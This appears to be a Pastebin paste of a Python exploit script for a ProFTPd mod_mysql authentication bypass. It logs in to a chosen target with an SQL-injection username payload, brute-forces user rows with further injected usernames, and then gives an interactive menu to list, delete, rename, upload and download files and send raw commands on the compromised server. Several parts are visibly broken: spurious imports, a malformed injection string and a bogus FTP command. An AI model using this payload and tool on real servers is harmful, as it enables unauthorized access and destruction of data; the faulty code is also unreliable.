Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # -*- coding: utf-8 -*-
- ## --------------------------------------------------------------------
- ## ProFTPd with mod_mysql Authentication Bypass Exploit [PYTHON]
- ## Code By NqrK
- ## Powered By Python 2.6
- ##
- ##
- ## --------------------------------------------------------------------
- ## Class : Input Validation Error
- ## Remote: Yes
- ## Credit:
- ## Page :
- ##
- ##
- ##
- ## --------------------------------------------------------------------
- ##
- ## to sufficiently sanitize user-supplied data before using it in an SQL query.
- ##
- ## modify data, or exploit latent vulnerabilities in the underlying database.
- ## This may result in unauthorized access and a compromise of the application,
- ## other attacks are also possible.
- ## --------------------------------------------------------------------
- import os
- import sys
- import ftplib
- from ftplib import FTP
- from Xlib.protocol.structs import Host
- from __builtin__ import raw_input
- from twisted.protocols import ftp
- try:
- os.system('color 0a')
- os.system('title ProFTPd with mod_mysql Authetication Bypass Exploit')
- except:
- print("[!]You are in Unix, Change of exploit... [ok].")
- print("[+]Run modules Unix_Kernel..[RUN].\n")
- def Core():
- """
- """
- print("\n\t[!]Please Choose a Command To Execut On ", Host, "\n")
- print("[1] Show Files.")
- print("[2] Delete Files.")
- print("[3] Rename Files or Dir")
- print("[4] Create Directory")
- print("[5] Personnal Command")
- print("[6] Download Files")
- print("[7] Upload Files")
- print("[8] Change Directory")
- print("[9] Clear Console")
- print("[0] Show Menu")
- print("[E] Exit\n")
- while (1):
- cmd = raw_input("root@cmd ~ #")
- if cmd == "1":
- print("[!]Listing File On Server : ", Host, "...\n")
- try:
- ftp.retrlines('LIST')
- print("[+]Listing File On", Host, "is SuccessFul !\n")
- except:
- print("[!] Cannot Listing File On", Host, "\n\a")
- elif cmd == "2":
- print("[!] Please Specify a File To Delete\n")
- try:
- File = raw_input("Remove File : ")
- ftp.delete(File)
- print("[+]File {", File, "} Deleted ! \n")
- except:
- print("[!] Cannot Deleting File On", Host, "\n\a")
- elif cmd == "3":
- print("[!] Please Speecify a File To Rename\n")
- try:
- File = raw_input("Rename File : ")
- Rename = raw_input("New Name : ")
- ftp.rename(File, Rename)
- print("[+]File {", File, "} Renamed to {", Rename, "} \n")
- except:
- print("[!] Cannot Renamed File On", Host, "\n\a")
- elif cmd == "4":
- print("[!] Please Specify a Directory Name To create\n")
- try:
- DIR = raw_input("New Directory : ")
- ftp.mkd(DIR)
- print("[+]Create a New Directory !\n")
- except:
- print("[!] Cannot Created DIR On", Host, "\n\a")
- elif cmd == "5":
- print("[!] Please Enter you Command :")
- print("[!] Enter ''/close'' for Exit Option\n")
- while (1):
- perso_cmd = raw_input("root@server ~ # ")
- if perso_cmd == "/close":
- break
- else:
- try:
- request = ftp.sendcmd(perso_cmd)
- print(request)
- except:
- print("[!]Command not Found On ", Host, "\n\a")
- elif cmd == "6":
- print("[!] Please Specify a Files Name To Download\n")
- Rem_Files = raw_input("Download Files : ")
- try:
- ftp.sendcmd('GET '+ Rem_Files)
- print("[+]File {", Rem_Files, "} Downloaded !\n")
- except:
- print("[!] Cannot Download Files On ", Host, "\n\a")
- elif cmd == "7":
- print("[!] Please Specify a Files Name To Upload\n")
- try:
- File = raw_input("Files : ")
- upl = open(File, 'rb')
- ftp.storbinary('STOR '+File, upl)
- upl.close()
- print("[+]File {", File,"} Uploaded !\n")
- except:
- print("[!] Cannot Upload Files On ", Host, "\n\a")
- elif cmd == "8":
- print("[!] Please Specify a Directory Name To Changed\n")
- try:
- Dir = raw_input("Directory : ")
- ftp.sendcmd('CWD '+ Dir)
- print("[+]Directory : ", Dir, "\n")
- except:
- print("[!] Cannot Changed Directory On ", Host, "\n\a")
- elif cmd == "9":
- try:
- os.system('cls')
- except:
- os.system('clear')
- elif cmd == "0":
- print("\n\t[!]Please Choose a Chommand To Execut On ", Host, "\n")
- print("[1] Show Files.")
- print("[2] Delete Files.")
- print("[3] Rename Files or Dir")
- print("[4] Create Files or Dir")
- print("[5] Personnal Command")
- print("[6] Download Files")
- print("[7] Upload Files")
- print("[8] Change Directory")
- print("[9] Clear Console")
- print("[0] Show Menu")
- print("[E] Exit\n")
- elif cmd == "E":
- ftp.quit()
- print("[!]Disconnection.....[ok].\a")
- print("[+]Unloading exploit....[ok].\a")
- print("Exit...[OUT].\a\n")
- raw_input("Press ENTER To Continue...")
- break
- def Brute():
- print("\n\t=================================================")
- print("\t [+] Attempting User Directory Discover Via FTP")
- print("\t=================================================\n")
- go = raw_input("[*] Target Online : ")
- print("\n")
- def brute():
- for i in range(0, 31):
- try:
- username = "%') and 1 = 2 union select 1, 1uid, gid, homedir, shell from ftpuser LINIT "+str(i) +",1; --"
- password = str("1")
- ftp = FTP(go)
- ftp.login(username, password)
- print("\n\a\t[+] Logged in as user "+ str(i) +",1")
- ftp.retrlines('LIST')
- ftp.close()
- except:
- print("[!] Invalid USER ["+str(i)+"] number On ", go, "....Auto-Restart BruteForcer.")
- brute()
- print("\n[$] Brute-Force Finished..\n")
- raw_input()
- print("")
- print("\t=========================================================")
- print("\t[+] ProFTPd with mod_mysql Authentication Bypass Exploit")
- print("\t[+] Credits Go For NqrK For Finding The Bug !")
- print("\t [+]Exploited By NqrK")
- print("\t [+]Forum.pr0ceed.net")
- print("\t=========================================================\n\a")
- user = "%') and 1=2 union select 1, 1uid, gid, homedir, shell from ftpuser, --"
- passwd = "1"
- Host = raw_input(" [*]Target: ")
- print("\n\a [!] Attacking ", Host, "...\n")
- try:
- print("[+]Conneect to host [waiting please]...\n\a")
- ftp = FTP(Host)
- print("[+]Connected to ", Host, "\n\a")
- try:
- print("[+]loading exploit...Attacking..[Waiting Please]. \n")
- ftp.login(user, passwd)
- try:
- print("[+]Attacking succeessful !\n\a")
- print("[+]Exploit PWNED The Machine : ", Host, " Enter in Matrix...\a\n")
- Core()
- sys.exit()
- except:
- print("[!]END ProFTPd with mod_mysql Authentication Bypass Exploit in Python 3.5 By NqrK\n\a")
- except:
- print("[!] Couldn't ByPass The authentication !\a\n")
- print("\n[+] Attempting User Directory Discover Via FTP [+]\n ")
- choice = raw_input("(yes)/(no): ")
- if choice == "yes":
- Brute()
- else:
- pass
- except:
- print("[!] Cannot connect to ", Host, "\n\a")
- raw_input()
- ##END
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement